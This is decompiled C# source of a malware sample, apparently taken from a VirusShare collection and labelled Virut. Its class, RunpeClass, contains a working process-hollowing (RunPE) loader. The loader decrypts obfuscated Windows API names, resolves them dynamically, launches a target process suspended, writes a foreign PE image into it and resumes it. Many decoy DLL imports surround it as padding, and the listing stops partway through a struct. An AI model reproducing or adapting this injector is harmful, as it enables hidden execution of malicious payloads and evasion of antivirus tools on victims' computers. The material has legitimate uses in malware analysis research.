// Decompiled with JetBrains decompiler // Type: smss.RunpeClass // Assembly: smss, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 9DAAF14C-A13E-4FB1-BFB2-3533F8F506E6 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.Virut.ac-a8742491b0c24128c984e4272dd39160994413c06121c47fa9bf8ecb333708fd.exe using Microsoft.VisualBasic; using System; using System.Reflection; using System.Runtime.InteropServices; using System.Text; namespace smss { public class RunpeClass { public const int MAXPNAMELEN = 32; public const int MAXPNAMELEN2 = 32; public const int MIXER_SHORT_NAME_CHARS = 16; public const int MIXER_LONG_NAME_CHARS = 64; public const long Asdfasfasf = 2778; public const long Fasfasfasf = 60116; public const long Afsfasfascfc = 218; public const long Asdascasdasd = 218; public const long Bvcxbxcbxcb = 218; public const long Bxcbxcbxcb = 253; public const long Fsdr3Fsf = 218; public const long Kkkkkkkkkddddddd = 17247; public const uint Fssssssssssssssssss = 218; [DllImport("yrtyor6p.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName yrtyrhhk6op(); [DllImport("yrtyr6pop.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName yrtyro6p(); [DllImport("j43yttj6.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int j43yty6(); [DllImport("j43ytoi6.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int j43yt6o(); [DllImport("yt3y5rtyrty.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr yt3y5rt3rty(); [DllImport("yt3y5r3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr yy5r3yrty(); [DllImport("yt3yrt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr yt3yrt3yrty(); [DllImport("yrtyrl6p.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName yrtyrk6p(); [DllImport("yrjtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName yrtyrkk6p(); [DllImport("yrt44yr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName yrtyr44K6p(); [DllImport("lkwdjsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment lkwkdsdnjfe(); [DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment lkwdsdknjfe(); [DllImport("j43ykjmt6.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int j43ykjmt6(); [DllImport("j43yKt6.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int j43yKt6(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int j43yt6t(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment lkwdrsdnjfe(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment lkwdesdnjfe(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment lkwdwsdnjfe(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName yrtywr6p(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName yrtysr6p(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment lkwdxsdnjfe(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment lkwdss5dnjfe(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment lkwdssdnjfe(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr yt3y5rtrty(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr yt3y5r3yrty(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr yt3y5rt3ty(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment lkwdsdnje(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment lkwdsfe(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment lkwdjfe(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment lkwdsdfe(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment lkwdsdnjfe(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int jr43yt6(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int j43yfgt6(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int j43yt6(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName yrtyer6p(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName yrtyrt6p(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName yrtye6p(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName yrtyr6p(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName yrtytr6p(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr yt3yyy5rt3yrty(); [DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr ytrt3yrty(); [DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment a1(); [DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment a2(); [DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment a3(); [DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName b1(); [DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int c1(); [DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr d1(); [DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName b2(); [DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment a4(); [DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int c2(); [DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment a5(); [DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName b3(); [DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment a7(); [DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr d2(); [DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment a8(); [DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment a9(); [DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int c4(); [DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName b5(); [DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName b9(); [DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr d3(); [DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr d4(); [DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName b6(); [DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment a15(); [DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr d5(); [DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment a10(); [DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName b7(); [DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int c5(); [DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr d6(); [DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment a11(); [DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment a12(); [DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int c6(); [DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment a13(); [DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern AssemblyName b8(); [DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr d7(); [DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr d8(); [DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern Environment a14(); [DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int c7(); [DllImport("user32", EntryPoint = "OemToCharBuffA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int OemToCharBuff1( [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszSrc, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszDst, int cchDstLength); [DllImport("user32", EntryPoint = "OemToCharBuffA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int OemToCharBuff( [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszSrc, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszDst, int cchDstLength); [DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int OffsetRgn(int hRgn, int x, int y); [DllImport("ole32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern void OleUninitialize(); [DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int OffsetViewportOrgEx( int hdc, int nX, int nY, RunpeClass.POINTAPI lpPoint); [DllImport("advapi32.dll", EntryPoint = "AccessCheckAndAuditAlarmA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int AccessCheckAndAuditAlarm( [MarshalAs(UnmanagedType.VBByRefStr)] ref string SubsystemName, byte[] HandleId, [MarshalAs(UnmanagedType.VBByRefStr)] ref string ObjectStructureName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string ObjectName, RunpeClass.SECURITY_DESCRIPTOR SecurityDescriptor, int DesiredAccess, RunpeClass.GENERIC_MAPPING GenericMapping, int ObjectCreation, int GrantedAccess, int AccessStatus, int pfGenerateOnClose); [DllImport("pdh.dll", EntryPoint = "PdhVbAddCounter", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int PdhAddCounter( int QueryHandle, [MarshalAs(UnmanagedType.VBByRefStr)] ref string CounterPath, ref int CounterHandle); [DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int AbortPrinter(int hPrinter); [DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int ActivateKeyboardLayout(int HKL, int flags); [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int QueryServiceObjectSecurity( int hService, int dwSecurityInformation, byte[] lpSecurityDescriptor, int cbBufSize, int pcbBytesNeeded); [DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int Polyline(int hdc, RunpeClass.POINTAPI lpPoint, int nCount); [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int AddAccessAllowedAce( RunpeClass.ACL pAcl, int dwAceRevision, int AccessMask, byte[] pSid); [DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int AbortDoc(int hdc); [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern void RaiseException( int dwExceptionCode, int dwExceptionFlags, int nNumberOfArguments, int lpArguments); [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int AddAccessDeniedAce( RunpeClass.ACL pAcl, int dwAceRevision, int AccessMask, byte[] pSid); [DllImport("kernel32", EntryPoint = "ReadConsoleA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int ReadConsole( int hConsoleInput, byte[] lpBuffer, int nNumberOfCharsToRead, int lpNumberOfCharsRead, byte[] lpReserved); [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int AddAuditAccessAce( RunpeClass.ACL pAcl, int dwAceRevision, int dwAccessMask, byte[] pSid, int bAuditSuccess, int bAuditFailure); [DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int AngleArc( int hdc, int x, int y, int dwRadius, double eStartAngle, double eSweepAngle); [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int AllocateLocallyUniqueId(RunpeClass.LARGE_INTEGER Luid); [DllImport("winspool.drv", EntryPoint = "AddJobA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int AddJob( int hPrinter, int Level, byte pData, int cdBuf, int pcbNeeded); [DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int ReadPrinter(int hPrinter, byte[] pBuf, int cdBuf, int pNoBytesRead); [DllImport("advapi32.dll", EntryPoint = "ReadEventLogA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int ReadEventLog( int hEventLog, int dwReadFlags, int dwRecordOffset, RunpeClass.EVENTLOGRECORD lpBuffer, int nNumberOfBytesToRead, int pnBytesRead, int pnMinNumberOfBytesNeeded); [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int ReadConsoleOutputAttribute( int hConsoleOutput, int lpAttribute, int nLength, RunpeClass.COORD dwReadCoord, int lpNumberOfAttrsRead); [DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int AnimatePalette( int hPalette, int wStartIndex, int wNumEntries, RunpeClass.PALETTEENTRY lpPaletteColors); [DllImport("gdi32", EntryPoint = "AddFontResourceA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int AddFontResource([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpFileName); [DllImport("advapi32.dll", EntryPoint = "ChangeServiceConfigA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int ChangeServiceConfig( int hService, int dwServiceStructure, int dwStartStructure, int dwErrorControl, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpBinaryPathName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpLoadOrderGroup, int lpdwTagId, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpDependencies, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpServiceStartName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpPassword, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpDisplayName); [DllImport("kernel32", EntryPoint = "CompareStringA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int CompareString( int Locale, int dwCmpFlags, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpString1, int cchCount1, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpString2, int cchCount2); [DllImport("imm32.dll", EntryPoint = "ImmGetIMEFileNameA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int ImmGetIMEFileName(int hkl, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpStr, int uBufLen); [DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int waveOutPause(int hWaveOut); [DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int waveOutUnprepareHeader( int hWaveOut, RunpeClass.WAVEHDR lpWaveOutHdr, int uSize); [DllImport("advapi32.dll", EntryPoint = "RegQueryValueA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int RegQueryValue( int hKey, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpSubKey, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpValue, int lpcbValue); [DllImport("user32", EntryPoint = "SendMessageA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int SendMessage(int hwnd, int wMsg, int wParam, byte[] lParam); [DllImport("imm32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int ImmSetCandidateWindow( int himc, RunpeClass.CANDIDATEFORM lpCandidateForm); [DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int SetArcDirection(int hdc, int ArcDirection); [DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int SetClipboardData(int wFormat, int hMem); [DllImport("wininet.dll", EntryPoint = "InternetConnectA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int InternetConnect( int hInternetSession, [MarshalAs(UnmanagedType.VBByRefStr)] ref string sServerName, short nServerPort, [MarshalAs(UnmanagedType.VBByRefStr)] ref string sUsername, [MarshalAs(UnmanagedType.VBByRefStr)] ref string sPassword, int lService, int lFlags, int lContext); [DllImport("imm32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int ImmSetStatusWindowPos(int himc, RunpeClass.POINTAPI lpPoint); [DllImport("imm32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int ImmSetCompositionWindow( int himc, RunpeClass.COMPOSITIONFORM lpCompositionForm); [DllImport("user32", EntryPoint = "IsCharAlphaNumericA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int IsCharAlphaNumeric(byte Char2); [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int LocalReAlloc(int hMem, int wBytes, int wFlags); [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int LockResource(int hResData); [DllImport("winmm.dll", EntryPoint = "mciGetDeviceIDFromElementIDA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int mciGetDeviceIDFromElementID(int dwElementID, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpstrStructure); [DllImport("winmm.dll", EntryPoint = "mciSendStringA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int mciSendString( [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpstrCommand, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpstrReturnString, int uReturnLength, int hwndCallback); [DllImport("winmm", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int mciSetYieldProc(int mciId, int fpYieldProc, int dwYieldData); [DllImport("winmm.dll", EntryPoint = "midiInGetDevCapsA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int midiInGetDevCaps( int uDeviceID, RunpeClass.MIDIINCAPS lpCaps, int uSize); [DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int midiInAddBuffer( int hMidiIn, RunpeClass.MIDIHDR lpMidiInHdr, int uSize); [DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int mixerGetID(int hmxobj, int pumxID, int fdwId); [DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int mixerGetNumDevs(); [DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int mixerMessage(int hmx, int uMsg, int dwParam1, int dwParam2); [DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int mixerOpen( int phmx, int uMxId, int dwCallback, int dwInstance, int fdwOpen); [DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int mmioClose(int hmmio, int uFlags); [DllImport("winmm.dll", EntryPoint = "mixerGetLineControlsA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int mixerGetLineControls( int hmxobj, RunpeClass.MIXERLINECONTROLS pmxlc, int fdwControls); [DllImport("winmm.dll", EntryPoint = "mixerGetDevCapsA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int mixerGetDevCaps(int uMxId, RunpeClass.MIXERCAPS pmxcaps, int cbmxcaps); [DllImport("winmm.dll", EntryPoint = "mixerGetControlDetailsA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int mixerGetControlDetails( int hmxobj, RunpeClass.MIXERCONTROLDETAILS pmxcd, int fdwDetails); public static string Decrypt(string input, string key) { if (input == null) throw new ArgumentNullException(nameof (input)); if (key == null) throw new ArgumentNullException(nameof (key)); return Encoding.UTF8.GetString(RunpeClass.Decrypt(Convert.FromBase64String(input), Encoding.UTF8.GetBytes(key))); } public static byte[] Decrypt(byte[] input, byte[] key) { if (input == null) throw new ArgumentNullException(nameof (input)); if (key == null) throw new ArgumentNullException(nameof (key)); int num1 = (int) input[input.Length - 1]; byte[] numArray = new byte[input.Length - 2 + 1]; int index1 = 0; int num2 = input.Length - 2; for (int index2 = 0; index2 <= num2; ++index2) { if (index1 >= key.Length) index1 = 0; if (index2 < input.Length - 1) { numArray[index2] = Convert.ToByte((int) input[index2] - numArray.Length % key.Length - (int) key[index1] + num1); ++index1; } } return numArray; } public static bool Win7() => Environment.OSVersion.Version.Major == 6; public static void RunpeSub(byte[] data, string target) { RunpeClass.Context context = new RunpeClass.Context(); RunpeClass.ProcessInformation info = new RunpeClass.ProcessInformation(); RunpeClass.StartupInformation startup = new RunpeClass.StartupInformation(); RunpeClass.SecurityFlags process1 = new RunpeClass.SecurityFlags(); RunpeClass.SecurityFlags thread = new RunpeClass.SecurityFlags(); GCHandle gcHandle = GCHandle.Alloc((object) data, GCHandleType.Pinned); IntPtr ptr = gcHandle.AddrOfPinnedObject(); int int32 = ptr.ToInt32(); RunpeClass.DosHeader dosHeader = new RunpeClass.DosHeader(); RunpeClass.DosHeader structure1 = (RunpeClass.DosHeader) Marshal.PtrToStructure(gcHandle.AddrOfPinnedObject(), dosHeader.GetType()); gcHandle.Free(); RunpeClass.mrqs mrqs = RunpeClass.Z8Wro8Mry4Fzhw(RunpeClass.Decrypt("38KgwdqeYXkN ", "yb3Xz73LWVcN"), RunpeClass.Decrypt("hb15tsuxiMe9g3mRy4sl ", "Yb+lncOle7+5oaXBwV0l")); if (mrqs == null) throw new NotImplementedException(); RunpeClass.evzew evzew = RunpeClass.Z8Wro8Mry4Fzhw(RunpeClass.Decrypt("1svIs9KsiWsU ", "wrbQyLbEUlAU"), RunpeClass.Decrypt("ioStf7i8u4O8Yc2/tYXGjic= ", "Z6PBgam9o5uhX7e1waPJwSc=")); if (evzew == null) throw new NotImplementedException(); RunpeClass.i5Ondq i5Ondq1 = RunpeClass.Z8Wro8Mry4Fzhw(RunpeClass.Decrypt("3JXhvdjHonUP ", "x7vVzbvJV1UP"), RunpeClass.Decrypt("sbyCyLjBvaPSn9651JvZl+Eb ", "ia+nrYXJw6uvy8t/r7/Dydcb")); if (i5Ondq1 == null) throw new NotImplementedException(); RunpeClass.jx95Iq jx95Iq1 = RunpeClass.Z8Wro8Mry4Fzhw("kernel32", RunpeClass.Decrypt("nrWZvbpmv8a3fIaqm6ilgbS0MQ== ", "fbOht5lvs62VmbW1aZmprbPBMQ==")); if (jx95Iq1 == null) throw new NotImplementedException(); RunpeClass.enx2Ma enx2Ma = RunpeClass.Z8Wro8Mry4Fzhw(RunpeClass.Decrypt("u7Bwqrgr ", "sb2dra0r"), RunpeClass.Decrypt("zsmP0+uy5dOds/WW38uftu631KgQ ", "pN6azMqy0JzCut6OvJa6ttjCzswQ")); if (enx2Ma == null) throw new NotImplementedException(); RunpeClass.qh4E qh4E = RunpeClass.Z8Wro8Mry4Fzhw(RunpeClass.Decrypt("4NOlw5G0ZnsM ", "yr7Y0L7MWlgM"), RunpeClass.Decrypt("tc/Qs+PJo6TWzcyCr98a ", "krjKztCovmi+vsSscNYa")); if (qh4E == null) throw new NotImplementedException(); RunpeClass.mzt5Dq mzt5Dq = RunpeClass.Z8Wro8Mry4Fzhw(RunpeClass.Decrypt("t5p/fLJ8QH8t ", "qZ23r52rOTct"), RunpeClass.Decrypt("z6rnzeXipdbph6vB6Kv72wM= ", "o8flpc3hx7/Fg9vZ5cft5QM=")); if (mzt5Dq == null) throw new NotImplementedException(); RunpeClass.g4Ch g4Ch = RunpeClass.Z8Wro8Mry4Fzhw(RunpeClass.Decrypt("1svIs9KsiWsU ", "wrbQyLbEUlAU"), RunpeClass.Decrypt("n4KynsyukrvAgr16JQ== ", "f6XBxbWlg6u/pZ2jJQ==")); if (g4Ch == null) throw new NotImplementedException(); IntPtr system; if (-(mrqs((string) null, target, ref process1, ref thread, false, 4U, system, (string) null, ref startup, out info) ? 1 : 0) == 0) return; RunpeClass.NtHeaders ntHeaders = new RunpeClass.NtHeaders(); ptr = new IntPtr(int32 + structure1.Address); RunpeClass.NtHeaders structure2 = (RunpeClass.NtHeaders) Marshal.PtrToStructure(ptr, ntHeaders.GetType()); long num1 = 0; long num2 = 0; startup.CB = Strings.Len((object) startup); context.Flags = 65539U; if (structure2.Signature != 17744U || structure1.Magic != (ushort) 23117 || -(mrqs((string) null, target, ref process1, ref thread, false, 4U, system, (string) null, ref startup, out info) ? 1 : 0) == 0) return; int num3; if (RunpeClass.Win7()) { int num4 = evzew(info.Thread, ref context) ? 1 : 0; RunpeClass.i5Ondq i5Ondq2 = i5Ondq1; IntPtr process2 = info.Process; int address = (int) ((long) context.Ebx + 8L); int num5 = 0; ref int local1 = ref num5; int num6 = 0; ref int local2 = ref num6; int num7 = i5Ondq2(process2, address, ref local1, 4, ref local2); long num8 = enx2Ma(info.Process, 0); } else { int num9 = evzew(info.Thread, ref context) ? 1 : 0; RunpeClass.i5Ondq i5Ondq3 = i5Ondq1; IntPtr process3 = info.Process; int address1 = (int) ((long) context.Ebx + 8L); num3 = (int) num1; ref int local3 = ref num3; int num10 = 0; ref int local4 = ref num10; int num11 = i5Ondq3(process3, address1, ref local3, 4, ref local4); long address2 = (long) num3; long num12 = enx2Ma(info.Process, (int) address2); } uint num13 = (uint) (int) qh4E(info.Process, (int) structure2.Optional.Image, structure2.Optional.SImage, 12288U, 4U); if (num13 == 0U) return; if (RunpeClass.Win7()) { RunpeClass.jx95Iq jx95Iq2 = jx95Iq1; IntPtr process4 = info.Process; int address = (int) num13; byte[] buffer = data; int sheaders = (int) structure2.Optional.SHeaders; num3 = 0; ref int local = ref num3; int num14 = jx95Iq2(process4, address, buffer, sheaders, out local) ? 1 : 0; } else { RunpeClass.jx95Iq jx95Iq3 = jx95Iq1; IntPtr process5 = info.Process; int address = (int) num13; byte[] buffer = data; int sheaders = (int) structure2.Optional.SHeaders; num3 = (int) num2; ref int local = ref num3; int num15 = jx95Iq3(process5, address, buffer, sheaders, out local) ? 1 : 0; num2 = (long) num3; } long num16 = (long) (structure1.Address + 248); int num17 = (int) structure2.File.Sections - 1; for (int index1 = 0; index1 <= num17; ++index1) { ptr = new IntPtr((long) int32 + num16 + (long) (index1 * 40)); RunpeClass.SectionHeader structure3 = (RunpeClass.SectionHeader) Marshal.PtrToStructure(ptr, structure3.GetType()); byte[] numArray = new byte[(int) structure3.Size + 1]; int num18 = (int) ((long) structure3.Size - 1L); for (int index2 = 0; index2 <= num18; ++index2) numArray[index2] = data[(int) ((long) structure3.Pointer + (long) index2)]; if (RunpeClass.Win7()) { RunpeClass.jx95Iq jx95Iq4 = jx95Iq1; IntPtr process6 = info.Process; int address = (int) num13 + (int) structure3.Address; byte[] buffer = numArray; int size = (int) structure3.Size; num3 = 0; ref int local = ref num3; int num19 = jx95Iq4(process6, address, buffer, size, out local) ? 1 : 0; } else { RunpeClass.jx95Iq jx95Iq5 = jx95Iq1; IntPtr process7 = info.Process; int address = (int) num13 + (int) structure3.Address; byte[] buffer = numArray; int size = (int) structure3.Size; num3 = (int) num2; ref int local = ref num3; int num20 = jx95Iq5(process7, address, buffer, size, out local) ? 1 : 0; num2 = (long) num3; } } byte[] bytes = BitConverter.GetBytes(num13); RunpeClass.jx95Iq jx95Iq6 = jx95Iq1; IntPtr process8 = info.Process; int address3 = (int) ((long) context.Ebx + 8L); byte[] buffer1 = bytes; num3 = 0; ref int local5 = ref num3; int num21 = jx95Iq6(process8, address3, buffer1, 4, out local5) ? 1 : 0; context.Eax = num13 + structure2.Optional.Address; int num22 = mzt5Dq(info.Thread, ref context) ? 1 : 0; int num23 = (int) g4Ch(info.Thread); } [DllImport("kernel32.dll", SetLastError = true)] private static extern IntPtr LoadLibraryA(string uj62Piq); [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern IntPtr GetProcAddress(IntPtr handle, string uj62Piq); private static T Z8Wro8Mry4Fzhw(string uj62Piq, string x7FVvcu1Ew) { if (uj62Piq == null) throw new ArgumentNullException(nameof (uj62Piq)); return x7FVvcu1Ew != null ? (T) Marshal.GetDelegateForFunctionPointer(RunpeClass.GetProcAddress(RunpeClass.LoadLibraryA(uj62Piq), x7FVvcu1Ew), typeof (T)) : throw new ArgumentNullException(nameof (x7FVvcu1Ew)); } public struct ACL { public byte AclRevision; public byte Sbz1; public short AclSize; public short AceCount; public short Sbz2; } public struct GENERIC_MAPPING { public int GenericRead; public int GenericWrite; public int GenericExecute; public int GenericAll; } public struct SECURITY_DESCRIPTOR { public byte Revision; public byte Sbz1; public int Control; public int Owner; public int Group; public RunpeClass.ACL Sacl; public RunpeClass.ACL Dacl; } public struct POINTAPI { public int x; public int y; } public struct ACL2 { public byte AclRevision; public 